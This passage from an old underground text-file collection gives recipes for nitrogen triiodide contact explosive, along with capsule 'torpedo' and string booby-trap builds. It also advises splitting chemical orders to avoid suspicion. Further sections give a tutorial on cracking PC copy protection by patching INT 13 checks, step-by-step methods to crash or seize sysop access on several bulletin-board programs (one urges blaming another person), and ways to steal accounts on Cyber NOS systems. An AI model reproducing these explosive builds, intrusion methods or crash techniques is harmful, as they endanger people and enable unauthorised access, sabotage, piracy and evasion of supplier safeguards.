  749. 2.) Paint type explosive. This will use up a lot of iodine crystals. Make up a
  750. strong tincture of iodine using about 4 ounces or 1/2 measuring cup of rubbing
  751. alcohol, denatured alcohol, or wood alcohol.  Wood alcohol is preferable. Add
  752. iodine crystals and shake thoroughly until no more will dissolve.  Pour the
  753. liquid into a fruit jar. Add the ammonium hydroxide and stir the mixture until
  754. the mixture is a chocolate brown and shows a little of the original color of
  755. the iodine. The amount of ammonia necessary will depend on its strength. An
  756. equal volume of ammonia is usually sufficient for a 15% or higher solution. The
  757. solution should be filtered at once, and shouldn't ever wait more than 10 or 15
  758. minutes, because it starts to dissolve again.
  759.  
  760. The explosive again should be stored and applied while wet. This material is
  761. chemically the same as the granular explosive, but because it was precipitated
  762. from a solution, it is much more finely divided, and the reaction happens
  763. almost simultaneously, so you can get it out before it all vanishes back into
  764. the solution.
  765.  
  766. 3.) Paint type #2. Dissolve 1 gram of potassium iodide in about 90cc of
  767. 18%-22% ammonium hydroxide. Add 4 grams of pulverized iodine. A deep black
  768. sediment should start forming. Let stand, and stir frequently for five minutes.
  769. Then, filter as usual. While the potassium iodide is not an integral part of
  770. the chemical reaction, the dissolved potassium iodide will allow the iodine
  771. crystals in turn to dissolve, and its common ion effect will cause less iodine
  772. crystals to be wasted. Since the iodine is by far the most expensive
  773. ingredient, you'll save money in the long run by using it.
  774.  
  775.                        Care in Handling And Storage  ∩7Å3 
  776. è
  777. Because this material is so unstable it deteriorates quickly. Don't make any
  778. more than you need to use in the next 24 hours. If you can't use it all
  779. immediately, the container you keep it in should be recapped tightly after use
  780. and the mouth wiped clean. The explosive can cause dark stain damage to things
  781. as rugs, clothing, chair seats, wallpaper, and light or clear plastics. A
  782. strong solution of sodium thiosulfate is effective for removing stains from
  783. hands and clothing before they set. Never leave the container of explosive in
  784. direct sunlight for more than a few minutes, as it will weaken the strength. Do
  785. NOT attempt to make a large explosion as it is dangerous and can cause
  786. deafness.  All equipment used should be thoroughly washed and the used filter
  787. paper flushed down the toilet. Under no circumstances attempt to handle the
  788. dried material which is extremely explosive and hazardous. If you can avoid
  789. storing the material in a container at all, there will be no chance that a
  790. loose stopper will let the material dry out and become a potential bomb. Tiny
  791. bits of this can be great fun, but it has to be handled with care.
  792.  
  793.                                  Application
  794.  
  795. Although largely a scientific curiosity, this explosive finds itself well
  796. suited for practical jokes. It may easily be painted on the bottom side of
  797. light switches, sprinkled on floors, painted in keyholes, pencil sharpeners,
  798. doorknobs and in hundreds of other unsuspected places. It is also ideal for
  799. catching locker thieves and desk prowlers. It will leave a dark stain on his
  800. hands when it explodes, and only you will know how to remove it.
  801.  
  802.                               Reaction Equations
  803.  
  804.                                     Ammonium
  805.           Ammonium      Ammonium    Nitrogen
  806. Iodine   Hydroxide       Iodide    Tri Iodide  Water
  807.  
  808. 3I     +   5NH OH   ---> 3NH I  +   NH NI    +  5H O
  809.   2           4             4         3  3        2
  810.  
  811. The theoretical yield of explosive from pure iodine is 54.1% by weight. The
  812. remainder of the iodine may be recovered for reuse from the ammonium iodide
  813. waste product by evaporating the waste liquid and treating with chlorine if a
  814. chemistry lab is available. The contact explosive is Ammonium Nitrogen
  815. Tri-Iodide, which explodes into iodine, nitrogen, and ammonia.
  816.  
  817.  Ammonium
  818.  Nitrigen
  819. Tri-Iodide     Iodine  Nitrogen Ammonia
  820.  
  821. 2NH NI    --->  3I   +    N    +  2NH
  822.    3  3           2        2         3
  823.  
  824.                       Some Clever Uses For This Material
  825.  
  826. 1.) Contact Explosive Torpedos. Get some gelatin capsules, the kind pills are
  827. made of. Fill the small half with uncooked dry tapioca until it is half full.
  828. Then place a wet blob of contact explosive about 4 times the size of a straight
  829. pin head on top of it. Either the granular or paint type explosive will work.
  830. The capsule is then filled the rest of the way up with tapioca until, when the  ∩7Å3 
  831. ècapsule is put together, the grains of tapioca are packed tightly, and none are
  832. loose. If this is not done properly, the torpedos could go off prematurely, and
  833. the joke would be on you. The torpedos are then moistened at the joints to seal
  834. them and stored until the next day. They are not sensitive enough until the
  835. next day and too sensitive the day after, so plan your activities accordingly.
  836. These torpedos are the most fiendish devices made. You can lay one on top of a
  837. door, where it will roll off when the door is opened, and it will explode on
  838. contact with the floor. If you toss one some distance away it will appear as if
  839. someone else was responsible for the explosion. These torpedos are ideal as
  840. booby traps or for pulling practical jokes with. They may be carried in a small
  841. box filled with cotton until needed. Just treat the box gently, and all will be
  842. well.
  843.  
  844. 2.Contact Explosive Booby Traps. Prepare a small amount of contact explosive.
  845. Cut strips of newspaper 1 1/2 inches wide and 1 foot long. Cut a piece of
  846. string 1 foot long. Put a small amount of wet contact explosive on the strip of
  847. paper 1 inch from the end. Double the string. Now pull one end of the string
  848. back until there is a double loop in the string about 1 inch long. Do not tie.
  849. Lay this double loop across the wet contact explosive and tightly roll the
  850. paper and glue the end. Put away for a few days until thoroughly dry. When dry,
  851. pull the ends of the string and the booby trap will explode. The strings, when
  852. pulled, rub against the dry contact explosive, and make it explode.
  853.  
  854.  
  855.                            Getting The Materials
  856.  
  857. There are quite a few chemical supply houses that you can mail order the
  858. materials you need. You'll have to sign a form stating that you're over 21 and
  859. won't use the chemicals for the types of things we're learning here. Note that
  860. the people who run these supply houses know what Iodine Crystals and Ammonium
  861. Hydroxide can do when mixed together, and if you order both from the same
  862. place, or in the same order, it may arouse some suspicion.
  863.  
  864. Check the classified ads in the back of magazines like Popular Science for the
  865. current supply houses. Order as many catalogs as you can find. Not all sell
  866. every chemical that you may want for this series. Also, you can break the
  867. orders up so as not to look suspicious. Lastly, some houses are used to selling
  868. to individuals, and will provide chemicals in 1 or 4 ounce lots, while others
  869. prefer to sell to large institutions, and sell their wares in 1 or 5 pound
  870. jugs. Split up your orders according to the quantities of each item you think
  871. you will be needing. An ounce of Iodine Crystals will cost three or four
  872. dollars an ounce, and an ounce bottle of iodine is pretty tiny, but it goes a
  873. long way. If you had to buy that by the pound, you might just want to forget
  874. the whole thing.
  875.  
  876.  
  877.  
  878.                     ****************************************
  879.                     *                                      *
  880.                     *        Cracking On the IBMpc         *
  881.                     *               Part I                 *
  882.                     *                                      *
  883.                     ****************************************
  884.  
  885. Introduction  ∩7Å3 
  886. è------------
  887.   For years, I have seen cracking tutorials for the APPLE computers, but never
  888. have I seen one for the PC.  I have decided to try to write this series to help
  889. that pirate move up a level to a crackest.
  890.  
  891.   In this part, I will cover what happens with INT 13 and how most copy
  892. protection schemes will use it.  I strongly suggest a knowledge of Assembly
  893. (M/L) and how to use DEBUG.  These will be an important figure in cracking
  894. anything.
  895.  
  896. INT-13 - An overview
  897. --------------------
  898.   Many copy protection schemes use the disk interrupt (INT-13).  INT-13 is
  899. often use to either try to read in a illegaly formatted track/sector or to
  900. write/format a track/sector that has been damaged in some way.  INT-13 is
  901. called like any normal interrupt with the assembler command INT 13 (CD 13).
  902. [AH] is used to select which command to be used, with most of the other
  903. registers used for data.
  904.  
  905. INT-13 Cracking Collage
  906. -----------------------
  907.   Although, INT-13 is used in almost all protection schemes, the easiest to
  908. crack is the DOS file.  Now the protected program might use INT-13 to load some
  909. other data from a normal track/sector on a disk, so it is important to
  910. determine which tracks/sectors are important to the protection scheme.  I have
  911. found the best way to do this is to use LOCKSMITH/pc (what, you don't have LS.
  912. Contact your local pirate for it.) Use LS to analyze the diskette.  Write down
  913. any track/sector that seems abnormal.  These track are must likely are part of
  914. the protection routine.  Now, we must enter debug. Load in the file execute a
  915. search for CD 13.  Record any address show.  If no address are picked up, this
  916. mean 1 or 2 things, the program is not copy protected (bullshit) or that the
  917. check is in an other part of the program not yet loaded.  The latter
  918. being a real bitch to find, so I'll cover it in part II.  There is another
  919. choice.  The CD 13 might be hidden in self changing code.  Here is what a
  920. sector of hidden code might look like
  921.  
  922. -U CS:0000
  923. 1B00:0000 31DB     XOR    BX,BX
  924. 1B00:0002 8EDB     MOV    DS,BX
  925. 1B00:0004 BB0D00   MOV    BX,000D
  926. 1B00:0007 8A07     MOV    AL,[BX]
  927. 1B00:0009 3412     XOR    AL,12
  928. 1B00:000B 8807     MOV    [BX],AL
  929. 1B00:000D DF13            FIST   WORD...
  930.  
  931.   In this section of code, [AL] is set to DF at location 1B00:0007.  When you
  932. XOR DF and 12, you would get a CD(hex) for the INT opcode which is placed right
  933. next to a 13 ie, giving you CD13 or INT- 13.  This type of code can't and will
  934. not be found using debug's [S]earch command.
  935.  
  936. Finding Hidden INT-13s
  937. ----------------------
  938.   The way I find best to find hidden INT-13s, is to use a program called PC-
  939. WATCH (TRAP13 works well also).  This program traps the interrupts and will
  940. print where they were called from.  Once running this, you can just disassemble  ∩7Å3 
  941. èaround the address until you find code that look like it is setting up the disk
  942. interrupt.
  943.   An other way to decode the INT-13 is to use debug's [G]o command.  Just set a
  944. breakdown at the address give by PC-WATCH (both programs give the return
  945. address).  Ie, -G CS:000F (see code above).  When debug stops, you will have
  946. encoded not only the INT-13 but anything else leading up to it.
  947.  
  948. What to do once you find INT-13
  949. -------------------------------
  950.   Once you find the INT-13, the hard part for the most part is over.  All that
  951. is left to do is to fool the computer in to thinking the protection has been
  952. found.  To find out what the computer is looking for, examine the code right
  953. after the INT-13.  Look for any branches having to do with the CARRY FLAG or
  954. any CMP to the AH register.  If a JNE or JC (etc) occurs, then [U]nassembe the
  955. address listed with the jump.  If it is a CMP then just read on.  Here you must
  956. decide if the program was looking for a protected track or just a normal track.
  957. If it has a CMP AH,0 and it has read in a protected track, it can be assumed
  958. that it was looking to see if the program had successfully complete the
  959. READ/FORMAT of that track and that the disk had been copied thus JMPing back to
  960. DOS (usually).  If this is the case, Just NOP the bytes for the CMP and the
  961. corresponding JMP.  If the program just checked for the carry flag to be set,
  962. and it isn't, then the program usually assumes that the disk has been copied.
  963. Examine the following code
  964.  
  965.       INT 13      <-- Read in the Sector
  966.       JC 1B00     <-- Protection found
  967.       INT 19      <-- Reboot
  968. 1B00  (rest of program)
  969.  
  970.   The program carries out the INT and find an error (the illegaly formatted
  971. sector) so the carry flag is set.  The computer, at the next instruction, see
  972. that the carry flag is set and know that the protection has not been breached.
  973. In this case, to fool the computer, just change the "JC 1B00" to a "JMP 1B00"
  974. thus defeating the protection scheme.
  975.  
  976.  
  977. NOTE: the PROTECTION ROUTINE might be found in more than just 1 part of the
  978.      program
  979.  
  980. Handling EXE files
  981. ------------------
  982.   As we all know, Debug can read .EXE files but cannot write them.  To get
  983. around this, load and go about cracking the program as usual.  When the
  984. protection scheme has been found and tested, record (use the debug [D]ump
  985. command) to save + & - 10 bytes of the code around the INT 13.  Exit back to
  986. dos and rename the file to a .ZAP (any extension but .EXE will do) and
  987. reloading with debug.  Search the program for the 20+ bytes surrounding the
  988. code and record the address found.  Then just load this section and edit it
  989. like normal.  Save the file and exit back to dos.  Rename it back to the .EXE
  990. file and it should be cracked.  ***NOTE: Sometimes you have to fuck around for
  991. a while to make it work.
  992.  
  993. DISK I/O (INT-13)
  994. -----------------
  995.   This interrupt uses the AH resister to select the function to be used.  Here  ∩7Å3 
  996. èis a chart describing the interrupt.
  997.  
  998. AH=0    Reset Disk
  999. AH=1    Read the Status of the Disk
  1000.         system in to AL
  1001.  
  1002.     AL          Error
  1003.   ----------------------------
  1004.     00   - Successful
  1005.     01   - Bad command given to INT
  1006.    *02   - Address mark not found
  1007.     03   - write attempted on write prot
  1008.    *04   - request sector not found
  1009.     08   - DMA overrun
  1010.     09   - attempt to cross DMA boundary
  1011.    *10   - bad CRC on disk read
  1012.     20   - controller has failed
  1013.     40   - seek operation failed
  1014.     80   - attachment failed
  1015. (* denotes most used in copy protection)
  1016. AH=2    Read Sectors
  1017.  
  1018.   input
  1019.      DL = Drive number (0-3)
  1020.      DH = Head number (0or1)
  1021.      CH = Track number
  1022.      CL = Sector number
  1023.      AL = # of sectors to read
  1024.   ES:BX = load address
  1025.   output
  1026.       AH =error number (see above)
  1027.           [Carry Flag Set]
  1028.       AL = # of sectors read
  1029.  
  1030. AH=3 Write (params. as above)
  1031. AH=4 Verify (params. as above -ES:BX)
  1032. AH=5 Format (params. as above -CL,AL
  1033.              ES:BX points to format
  1034.              Table)
  1035.  
  1036.   For more information on INT-13 see the IBM Technical Reference Manuals.
  1037.  
  1038. Coming Soon
  1039. ------------
  1040.   In part II, I will cover CALLs to INT-13 and INT-13 that is located in
  1041. different overlays of the program
  1042.  
  1043.  
  1044.  
  1045.   ***************************************************************************
  1046.   *                                                                         *
  1047.   *                          Cracking On the IBMpc                          *
  1048.   *                                 Part  II                                *
  1049.   *                                                                         *
  1050.   ***************************************************************************  ∩7Å3 
  1051. è
  1052. Introduction
  1053. ------------
  1054.  
  1055.   Ok guys, you now passed out of Kopy Klass 101 (dos files) and have this great
  1056. new game with overlays.  How the phuck do I crack this bitch.  You scanned the
  1057. entire .EXE file for the CD 13 and it's nowhere.  Where can it be you ask
  1058. yourself.
  1059.   In part II, I'll cover cracking Overlays and the use of locksmith in
  1060. cracking.  If you haven't read part I, then I suggest you do so.  The 2 files
  1061. go together.
  1062.  
  1063.  
  1064. Looking for Overlays
  1065. --------------------
  1066.   So, you cant find CD 13 in the .EXE file, well, it can mean 4 things.  1, the
  1067. .EXE (though it is mostly .COM) file is just a loader for the main file. 2, the
  1068. .EXE file loads in an overlay.  3, the CD 13 is encrypted &/or hidden in the
  1069. .EXE file. 4,
  1070.  your looking at the WRONG PHUCKEN PHILE.
  1071.   I won't discuss case 1 (or at least no here) because so many UNP files are
  1072. devoted to PROLOCK and SOFTGUARD, if you can't figure it out with them, your
  1073. PHUCKEN stupid.
  1074.   If you have case 3, use the technique in part I and restart from the beg. And
  1075. if you have case 4, shoot your self.
  1076.   You know the program uses overlays but don't see and on disk?  Try looking at
  1077. the disk with good old nortons.  Any hidden files are probably the overlays.
  1078. These are the ones we are after.  If you still can't find them, use PC-WATCH
  1079. (this program is a must!!! for all crackists.  Traps ALL interrupts).
  1080.  
  1081.  
  1082. Using PC-Watch to Find Overlays
  1083. -------------------------------
  1084.   Start up PC-Watch and EXCLUDE everything in the left col.  Search the right
  1085. col. until you find DOS21 - OpnFile and select it.  Now run the program to be
  1086. cracked.  Play the game until the protection is checked.  Examine you pcwatch
  1087. output to see what file was loaded right before it.  This probably is the one
  1088. holding the check.  If not, shit go through all the files.
  1089.  
  1090.  
  1091. You Have Found the Overlays
  1092. ---------------------------
  1093.   Great, now just crack the overlay as if it was a DOS file.  You don't need to
  1094. worry about .EXE file, debug can write an overlay file.  Part I explains the
  1095. basics of cracking.  I suggest that you keep a backup copy of the overlay so if
  1096. you phuck up, and you will, you can recover quickly. Ah, and you thought
  1097. cracking with overlays was going to be hard.
  1098.  
  1099.  
  1100. Locksmith and Cracking
  1101. ----------------------
  1102.  The copy/disk utility program Locksmith by AlphaLogic is a great tool in
  1103. cracking.  It's analyzing ability is great for determining what and where the
  1104. protection is.
  1105.  I find it useful, before I even start cracking, to analyze the protected disk
  1106. to find and id it's protection.  This helps in 2 ways.  First, it helps you to
  1107. know what to do in order to fake out the protection.  Second, it helps you to
  1108. find what the program is looking for.  ∩7Å3 
  1109. è I suggest that you get lomith if you don't already have it.  Check your
  1110. local pirate board for the program.  I also suggest getting PC-Watch and Norton
  1111. Utilities 3.1.  All of these program have many uses in the cracking world.
  1112.  
  1113.  
  1114.  
  1115.                          How To Crash a Commadore BBS
  1116.  
  1117. Part One - How to crash a RAVICS BBS
  1118.  
  1119.   Try to chat with the sysop. If it starts to say "Attemp #1" and so on, then
  1120. just hit 'C' >VERY< fast a few hundred times. After it pages the sysop about
  1121. 30 times it will give an out of memory error in such and such a line.
  1122.  
  1123. Part Two - How to crash an IIBBS
  1124.  
  1125.   This will only work if the sysop is running either an un-modified version
  1126. of IIBBS, or he has the very first version. Log on as a new user. Log off
  1127. and then log on again as a new user.  Then log off and try to log on again
  1128. as the SECOND new user you logged in as. In the old version, the BBS dosn't
  1129. initialize the drive after writing to the relative file. Therefore, when you
  1130. try to log in as the second new user, it will try to read past the bad
  1131. position but will never find it. This will leave his drive spinning until
  1132. he can come in and reset the system. If it dosn't work the first time try
  1133. again with two more new users, and so on. The system will just sit there
  1134. sending a carrier to you. When the drive is left spinning it will heat up the
  1135. metal frame in inside of the 1541 drive. This will cause the readwwrite head
  1136. to be knocked out of alignment, costing the sysop a mere $45...
  1137.  
  1138. Part 3 - How to crash a 64 Exchange
  1139.  
  1140.   Go into the download section and start to download a file. When it is ready
  1141. to send (it should say 'A to abort, B to change block size. Ready to send')
  1142. then select B and enter '99e99' when  it asks for the new block size (99e99 is
  1143. a number bigger than the computer can accept). This will only work on older
  1144. versions of 64 Exchange.
  1145.  
  1146.  
  1147. Part One - Another Way to Crash IIBBS
  1148.  
  1149.   Log on and enter the message base. At the prompt enter '99e99'. This will
  1150. cause an overflow error. If the sysop has a crash handling routine, then
  1151. use the method in How to Crash C64 BBS's - I and fry his drive. Here is
  1152. another way. If you log in and it says 'You have mail' or whatever, but it
  1153. dosn't list who it's from and the date, then go into the e-mail section.
  1154. Proceed to read your mail.  It should say 'No mail found' or whatever. At the
  1155. prompt, enter 'R' for reply or 'D' for delete. It will delete your mail and
  1156. cause an Illegal quantity error.
  1157.  
  1158. Part Two - How to Crash a RAVICS V9.3
  1159.  
  1160.   Log on as a new user. When it say it's creating your ID hit a bunch of keys.
  1161. This will lock up the program and leave his drive spinning.
  1162.  
  1163. Part Three - How to Crash Hal BBS 4.6  ∩7Å3 
  1164. è
  1165.   Enter 255 for your ID # and 'HAL' for the password. If the sysop has the
  1166. BASIC version this won't work. But if it does you will now be in the sysop
  1167. menu. Have fun...
  1168.  
  1169. Part Four - How to Crash Ace Line 3.5
  1170.  
  1171.   Log on and check to see if they are running the version modified by General
  1172. Zod (it should have his name all over it). If it is just call back about 10
  1173. times. Sooner or later it will cause an Out of Memory error.
  1174.  
  1175.  
  1176.                           How to crash GBBS ][ boards
  1177.  
  1178.       We all have that one local board around you that you would really
  1179. like to crash! Maybe the sysop did something really bad to you or
  1180. something in that nature! Boy he sure would get Mad when he wakes up with
  1181. both drives burned out, user file is messed up or something like that!
  1182.  
  1183.       One thing to remember is when you call the board to crash it, I'd
  1184. use a phoney allias name (even another person you want to get revenge
  1185. on too!) because they will really get mad about crashing thier board and
  1186. will really kick some ass when they find out who did it. Just a warning!
  1187.  
  1188. 1> Lets say the sysops name to the GBBS board is "Butch Jr.". Call the
  1189. place up and when it asks for your last name, type "Jr.". When it asks
  1190. for your password, type in what ever you have to type for a new user.
  1191. Then it should ask for your first name. Just type " Butch" (1 space
  1192. infront of name). This will automaticly put you into sysop command
  1193. level and you will be able to delete messages, users, exit the GBBS
  1194. program and initalize the disks and ect.....Just about anything your
  1195. little heart wants to do! Modify the board and delete the sysop too!
  1196. This way for crashing also works when you type in for last name:" Jr."
  1197. and first name "Butch". It should do the same thing. The one major
  1198. drawback to this way of crashing is that most GBBS boards have thier
  1199. oards modified to that you can't do this. They will have it either
  1200. hang up after you type it in, Display a nasty message for you, or
  1201. just ask for the last name again. Oh well! No body is perfect!
  1202.  
  1203. 2> Call the board up and log on as a new user. When it asks for the
  1204. city/state you live in, type in a few commas like this:
  1205.        "Tampa,,,,,,,,,,Fla" or ",,,,,,,,,,,,,,,,,,," will do!
  1206. You just have to have more than 2 or 3 commas to do the job right.
  1207. This way should kill the passwords on the user file! <ool!!
  1208.  
  1209. 3> When you leave a message up on the board, save it, and then it says
  1210. "Wait" for about 10 seconds. Vry this one: Leave a message on the board
  1211. and save it and when it says "Wait", Just do a little "esc-h"
  1212. (to hang up in Ascii Express). That way should be writting the message
  1213. and when it looses the carrier, it will be off the hook for the night!
  1214. You can hang up on either "Wait" (after saving message an` after you
  1215. abort into the main command board.
  1216.  
  1217. 4> When the GBBS asks for a number like board number or something like
  1218. that, type in "99E99". This creats and error on the board and might put  ∩7Å3 
  1219. èyou in sysop command level depending on what serial number the GBBS
  1220. program is. It will do some other things too.
  1221.  
  1222. 5> When you log on and it asks for your password, type in a negative
  1223. number like "G-99FFF" or "A-01AAA" or some negative number kinda like
  1224. that. This should also create an error and might even put you in sysop
  1225. command level (you can do anything from there! Believe me!) But
  1226. like I said before, Depending on what type of serial number the program
  1227. is.
  1228.  
  1229. 6> Log on as a new user and when it's reading the new user welcome or
  1230. just any text file, type "Cntl-s Cntl-p :" and that should make a fatal
  1231. error on his part and put you proptly into basic or machine language
  1232. with dos loaded and you can work from there!
  1233.  
  1234. 7> New user reading welcome message and type "Cntl-s Cntl-p *" and
  1235. that will bomb the board out also.
  1236.  
  1237. 8> New user reading welcome message and type "Cntl-s Cntl-p" and start
  1238. pounding on the keyboard! That sould fill the buffer up and make a
  1239. fatal error and put you into machine language or basic. Work from there!
  1240.  
  1241. 9> New user reading welcome message and type "Cntl-s" and hold repeat
  1242. and "Cntl-p" down and that will also bomb the buffer too and put
  1243. you into machine or basic language.
  1244.  
  1245.  
  1246.                     Hacking Control Data Corporation's Cyber
  1247.  
  1248.   This article will cover getting into and using NOS (Networking
  1249. Operating System) version 2.5.2 running on a Cyber 730 computer.  Cybers
  1250. generally run this operating system so I will just refer to this environment as
  1251. Cyber.  Also, Cyber is a slow and outdated operating system that is primarily
  1252. used only for college campuses for running compilers.  First off after you have
  1253. scanned a bunch of carriers you will need to know how Cyber identifies itself.
  1254. It goes like this:
  1255.  
  1256. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1257. COPYRIGHT CONTROL DATA 1978, 1987.
  1258.  
  1259. 88/02/16. 02.36.53. N265100
  1260. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1261. FAMILY:
  1262.  
  1263.   You would normally just hit return at the family prompt.  Next prompt is:
  1264.  
  1265. USER NAME:
  1266.  
  1267.   User names are in the format  abcdxxx  where a is the location of where
  1268. the account is being used from (A-Z).  the b is a grouping specifying
  1269. privileges and limits for the account- usually A-G -where A is the lowest
  1270. access.  Some examples of how they would be used in a college system:
  1271.    A = lowest access - class accounts for students
  1272.    B = slightly higher than A (for students working on large projects)
  1273.    C = Much higher limits, these accounts are usually not too hard to get  ∩7Å3 
  1274. è       and they will normally last a long time!  Lab assistants use these.
  1275.    D = Instructors, Lecturers, Professors.. etc..
  1276.    E = same... (very hard to get these!)
  1277.  
  1278.   The C and D positions are usually constant according to the groupings.
  1279.   For example, a class would have accounts ranging from NADRAAA-AZZ
  1280.                                                           ^^^ ^^^
  1281.                                                  These can also be digits
  1282.  
  1283.   There are also special operator accounts which start with digits instead
  1284. of numbers. (ie 7ETPDOC)  These accounts can run programs such as the
  1285. monitor which can observe any tty connected to the system...
  1286.  
  1287.   The next prompt will be for the password, student account passwords cannot
  1288. be changed and are 7 random letters by default, other account passwords
  1289. can be changed.  You get 3 tries until you are logged out.  It is very
  1290. difficult if not impossible to use a brute force hacker or try to guess
  1291. someones account.. so how do you get on?  Here's one easy way...
  1292. Go down to your local college (make sure they have a cyber computer!)
  1293. then just buy a class catalog (they only cost around 50 cents) or you
  1294. could look, borrow, steal someone else's... then find a pascal or fortran
  1295. class that fits your schedule!  You will only have to attend the class
  1296. 3 or 4 times max.  Once you get there you should have no trouble, but
  1297. if the instructor asks you questions about why you are not on the roll,
  1298. just tell him that you are auditing the class (taking it without enrolling
  1299. so it won't affect your GPA).  The instructor will usually pass out
  1300. accounts on the 3rd or 4th day of class.. this method also works well
  1301. with just about any system they have on campus!  Another way to get
  1302. accounts is to go down to the computer lab and start snooping!  Look
  1303. over someones shoulder while they type in their password, or look thru
  1304. someones papers while they're in the bathroom, or look thru the assistants
  1305. desk while he is helping someone... (I have acquired accounts both ways,
  1306. and the first way is a lot easier with less hassles)  Also, you can use
  1307. commas instead of returns when entering user name and password.
  1308. Example:  at the family prompt, you could type  ,nadrajf,dsfgkcd
  1309.                      or at the user name prompt   nadrajf,dsfgkcd
  1310.  
  1311.   After you enter your info, the system will respond with:
  1312.  
  1313. JSN: APXV, NAMIAF
  1314. /
  1315.  
  1316.   The 'APXV, NAMIAF' could be different depending on what job you were
  1317. attached to.  The help program looks a lot neat if you have vt100
  1318. emulation, if you do, type [screen,vt100] (don't type the brackets! from
  1319. now on, all commands I refer to will be enclosed in brackets)
  1320. Then type help for an extensive tutorial or a list of commands.
  1321. Your best bet at this point is to buy a quick reference guide at the
  1322. campus because I am only going to describe the most useful commands.
  1323. The / means you are in the batch subsystem, there are usually 6 or 7
  1324. other subsystems like basic, fortran, etc... return to batch mode by
  1325. typing [batch].
  1326.  
  1327. Some useful commands:
  1328.   ∩7Å3 
  1329. è   CATLIST    -  will show permanent files in your directory.
  1330.    ENQUIRE,F  -  displays temporary files in your workspace.
  1331.    LIMITS     -  displays your privileges.
  1332.    INFO       -  get more online help.
  1333.    R          -  re-execute last command.
  1334.    GET,fn     -  loads fn into the local file area.
  1335.    CHANGE     -  certain specs on a file.
  1336.    PERMIT     -  allow other users to use one of your files.
  1337.    REWIND,*   -  rewinds all your local files.
  1338.    NEW,fn     -  creates new file.
  1339.    PURGE      -  deletes files.
  1340.    LIST,F=fn  -  list file.
  1341.    UPROC      -  create an auto-execute procedure file.
  1342.    MAIL       -  send/receive private mail.
  1343.    BYE        -  logoff.
  1344.  
  1345.   Use the [helpme,cmd] command for the exact syntax and parameters of these
  1346. commands.  There are also several machine specific 'application' programs
  1347. such as pascal, fortran, spitbol, millions of others that you can look
  1348. up with the INFO command... there are also the text editors; edit, xedit,
  1349. and fse (full screen editor).  Xedit is the easiest to use if you are
  1350. not at a Telray 1061 terminal and it has full documentation.  Simply
  1351. type [xedit,fn] to edit the file 'fn'.
  1352.  
  1353.   Special control characters used with Cyber:
  1354.  
  1355.   Control S and Control Q work normally, the terminate character is
  1356. Control T followed by a carriage return.  If you wanted to break out of
  1357. an auto-execute login program, you would have to hit ^T C/R very fast
  1358. and repetitively in order to break into the batch subsystem.  Control Z
  1359. is used to set environment variables and execute special low level
  1360. commands, example: [^Z TM C/R] this will terminate your connection...
  1361.  
  1362.   So now you're thinking, what the hell is Cyber good for?  Well, they
  1363. won't have any phone company records, and you can't get credit information
  1364. from one, and I am not going to tell you how to crash it since crashing
  1365. systems is a sin.  There are uses for a cyber though,  one handy use is
  1366. to set up a chat system, as there are normally 30-40 lines going into
  1367. a large university cyber system.  I have the source for a chat program
  1368. called the communicator that I will be releasing soon.  Another use is
  1369. some kind of underground information exchange that people frequently
  1370. set up on other systems, this can easily be done with Cyber.
  1371.  
  1372. Procedure files:
  1373.  
  1374.   A procedure file is similiar to a batch file for MS-DOS, and a shell
  1375. script for UNIX.  You can make a procedure file auto-execute by using
  1376. the UPROC command like [uproc,auto] will make the file 'auto', auto
  1377. execute.  There is also a special procedure file called the procfile in
  1378. which any procedure may be accessed by simply a - in front of it.  If your
  1379. procfile read:
  1380.  
  1381. .proc,cn.
  1382. .*  sample procedure
  1383. $catlist/un=7etpdoc.
  1384. $exit.
  1385.   ∩7Å3 
  1386. è  Then you could simply type -cn and the / prompt and it would cute
  1387. the catlist command.  Now back to uprocs,  you could easily write a whole
  1388. BBS in a procedure file or say you wanted to run a chat system and you
  1389. did not want people to change the password on your account, you could
  1390. do this:
  1391.  
  1392. .proc,chat,
  1393. PW"Password: "=(*A).
  1394. $ife,PW="cyber",yes.
  1395.    $chat.
  1396.    $revert.
  1397.    $bye.
  1398. $else,yes.
  1399.    $note./Wrong password, try again/.
  1400.    $revert.
  1401.    $bye.
  1402. $endif,yes.
  1403.  
  1404.   This procedure will ask the user for a password and if he doesn't type
  1405. "cyber" he will be logged off.  If he does get it right then he will be
  1406. dumped into the chat program and as soon as he exits the chat program,
  1407. he will be logged off.  This way, the user cannot get into the batch
  1408. subsystem and change your password or otherwise screw around with the
  1409. account.  The following is a listing of the procfil that I use on my
  1410. local system, it has a lot of handy utilities and examples...
  1411.  
  1412.  
  1413. .PROC,B.
  1414. .******BYE******
  1415. $DAYFILE.
  1416. $NOTE.//////////////////////////
  1417. $ASCII.
  1418. $BYE.
  1419. $REVERT,NOLIST.
  1420. #EOR
  1421. .PROC,TIME.
  1422. .******GIVES DAY AND TIME******
  1423. $NOTE./THE CURRENT DAY AND TIME IS/
  1424. $FIND,CLOCK./
  1425. $REVERT,NOLIST.
  1426. #EOR
  1427. .PROC,SIGN*I,IN.
  1428. .******SIGN PRINT UTILITY******.
  1429. $GET,IN.
  1430. $FIND,SIGN,#I=IN,#L=OUT.
  1431. $NOTE./TO PRINT, TYPE:   PRINT,OUT,CC,RPS=??/
  1432. $REVERT,NOLIST.
  1433. #EOR
  1434. .PROC,TA.
  1435. .******TALK******
  1436. $SACFIND,AID,COMM.
  1437. $REVERT,NOLIST.
  1438. #EOR
  1439. .PROC,DIR,UN=,FILE=.
  1440. .******DIRECTORY LISTING OF PERMANENT FILES******
  1441. $GET(ZZZZDIR=CAT/#UN=1GTL0CL)
  1442. ZZZZDIR(FILE,#UN=UN)
  1443. $RETURN(ZZZZDIR)
  1444. $REVERT,NOLIST.
  1445. #EOR
  1446. .PROC,Z19.
  1447. .******SET SCREEN TO Z19******
  1448. $SCREEN,Z19.
  1449. $NOTE./SCREEN,Z19.
  1450. $REVERT,NOLIST.
  1451. #EOR
  1452. .PROC,VT.
  1453. .******SET SCREEN TO VT100******
  1454. $SCREEN,VT100.
  1455. $NOTE./SCREEN,VT100.  ∩7Å3 
  1456. è$REVERT,NOLIST
  1457. #EOR
  1458. .PROC,SC.
  1459. .******SET SCREEN TO T10******
  1460. $SCREEN,T10.
  1461. $NOTE./SCREEN,T10.
  1462. $REVERT,NOLIST
  1463. #EOR
  1464. .PROC,C.
  1465. .******CATLIST******
  1466. $CATLIST.
  1467. $REVERT,NOLIST.
  1468. #EOR
  1469. .PROC,CA.
  1470. .******CATLIST,LO=F******
  1471. $CATLIST,LO=F.
  1472. $REVERT,NOLIST.
  1473. #EOR
  1474. .PROC,MT.
